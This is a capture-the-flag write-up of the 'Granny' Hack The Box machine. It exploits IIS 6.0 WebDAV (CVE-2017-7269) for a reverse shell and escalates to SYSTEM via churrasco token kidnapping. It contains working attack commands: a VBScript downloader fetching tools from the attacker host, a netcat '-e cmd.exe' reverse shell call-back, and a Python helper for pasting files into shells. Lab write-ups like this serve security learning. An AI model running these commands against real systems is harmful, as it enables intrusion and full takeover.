Summary

Granny is an easy Windows box. It can be exploited by properly enumerating the box and finding that it is running Microsoft IIS 6.0, which is vulnerable to a well-known exploit: CVE-2017-7269 (WebDAV). The bug is a buffer overflow in the ScStoragePathFromUrl function of the WebDAV service, reachable through an overlong If header in a PROPFIND request. Abusing it gave a shell as nt authority\network service. That shell was then upgraded through token kidnapping with churrasco.exe to obtain a SYSTEM shell.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0

The automated nmap vulnerability scan flagged an entry with a CVSS score of 10.0 for this service: the WebDAV exploit described above. First, I browsed to the web page to get some more information:


Exploitation

I intercepted the request and saw that Microsoft IIS 6.0 is indeed running. The CVE-2017-7269 exploit script was then run against it to obtain a reverse shell; it takes the target host and port followed by the attacker's IP and listener port. The following command was executed:

python2.7 microsoft-iis6.py 10.129.101.72 80 10.10.14.147 9001

This provided a shell:

nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.101.72] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Privilege Escalation

I mistakenly thought this was a system shell but then quickly realised I simply misread since I couldn’t access the admin’s desktop. I checked systeminfo:

C:\WINDOWS\Temp>systeminfo
systeminfo

Host Name:                 Granny
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-297-2947634-44968
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 12 Minutes, 25 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 796 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,328 MB
Page File: In Use:         142 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

This shows Windows Server 2003 SP2 on x86. When googling for this, I came across this very nice GitHub page. Now you need a way to transfer files to the box. On these older systems certutil and PowerShell are not available, so you need something else. I always go for VBScript: the script below uses the WinHttpRequest COM object to fetch a URL (first argument) and writes the response body byte by byte to a file (second argument). It is really easy to set up. Paste the following echo lines into the shell to create wget.vbs on the machine:

rem wget.vbs: argument 0 is the URL to fetch, argument 1 the local file to write
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
rem try the WinHttp object first and fall back to the older XMLHTTP objects
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
rem write the response body to the file one byte at a time
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Now, with a web server on your host serving the file, you can run the following command to download it:

cscript /nologo wget.vbs http://10.10.14.147/churrasco.exe churrasco.exe

I also transferred over netcat:

cscript /nologo wget.vbs http://10.10.14.147/nc32.exe nc32.exe
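Building the downloader with echo works because none of the lines above contain a cmd metacharacter outside double quotes. For anything else (a script with &, |, <, > or ^ in it) the same trick silently corrupts the file. The Python 3 helper below is an added example, not part of the original writeup: it turns a local text file into the echo lines to paste, escaping only where cmd.exe would otherwise interpret the character, and places the redirection in front of echo so that a line ending in a digit is never misread as a file-handle redirect. The VBScript fragment embedded in it is constructed for the demonstration.

```python
"""Encode a local file as cmd.exe `echo` lines that recreate it on the target
through a raw reverse shell, the way wget.vbs is built above.

Added helper, not part of the writeup. It relies on cmd.exe's own parsing:
  * & | < > ^ are special only outside double quotes and get a ^ prefix
    there; inside a quoted span they are literal and a ^ would be written
    to the file verbatim, so nothing is escaped inside quotes;
  * ( and ) only matter inside a parenthesised block, so at the prompt they
    are left alone, as in the hand-written lines above;
  * % cannot be escaped at an interactive prompt, so lines containing a
    %NAME% pattern are reported rather than rewritten.
The redirection goes in front of echo (>>file echo text) so a line ending in
a digit is not misread as a handle redirect (`... 0 >> file`) and no trailing
space is added to the written line."""
import os
import re
import sys

CMD_SPECIAL = set("&|<>^")
PERCENT_VAR = re.compile(r"%[^%\s]+%")


def cmd_echo_line(text, target):
    """Return one cmd line that appends `text` plus a newline to `target`."""
    if text == "":
        return f">>{target} echo("  # `echo(` prints an empty line; bare `echo` prints its state
    out = []
    in_quotes = False
    for ch in text:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_SPECIAL and not in_quotes:
            out.append("^")
        out.append(ch)
    return f">>{target} echo {''.join(out)}"


def encode_text(text, target):
    """Split `text` on CRLF or LF and encode every line (a trailing newline adds no line)."""
    lines = text.replace("\r\n", "\n").split("\n")
    if lines and lines[-1] == "":
        lines.pop()
    return [cmd_echo_line(line, target) for line in lines]


def risky_lines(text):
    """1-based numbers of lines holding a %NAME% pattern that cmd may expand."""
    return [i for i, line in enumerate(text.splitlines(), 1) if PERCENT_VAR.search(line)]


# Constructed VBScript fragment for the demonstration: the fourth line mixes
# metacharacters outside and inside quotes, the last line is intentionally blank.
SAMPLE_VBS = "\r\n".join([
    "strUrl = WScript.Arguments.Item(0)",
    'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")',
    'http.Open "GET", strUrl, False',
    'If x < 1 And y > 2 Then WScript.Echo "a & b"',
    "",
]) + "\r\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 echo_encode.py <local file> [remote name]
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
        target = sys.argv[2] if len(sys.argv) > 2 else os.path.basename(sys.argv[1])
    else:
        text, target = SAMPLE_VBS, "wget.vbs"
    for n in risky_lines(text):
        print(f"warning: line {n} contains a %NAME% pattern cmd may expand", file=sys.stderr)
    print("\n".join(encode_text(text, target)))
```

Paste the printed lines into the reverse shell exactly as they are; the first one creates the file only if it does not already exist, so delete any stale copy on the target before pasting. Binaries still go through wget.vbs or netcat, since echo can only carry text.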

Finally, churrasco.exe takes a command line and runs it with a SYSTEM token it obtains from the RPCSS service; this token kidnapping works because NETWORK SERVICE holds SeImpersonatePrivilege. The -d flag prints its progress. Pointing it at the transferred netcat sends a shell back as SYSTEM:

churrasco.exe -d "C:\WINDOWS\Temp\nc32.exe -e cmd.exe 10.10.14.147 4444"

/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 476 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 700 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
The command completed successfully.

If you set up a listener on port 4444 beforehand (nc -nvlp 4444), this gives you a shell as NT AUTHORITY\SYSTEM.


Conclusion

This was a very simple box but useful nonetheless. I learned about the churrasco executable and really like it, so I will definitely use it for future boxes too since it's really easy to use. Hope you enjoyed this writeup!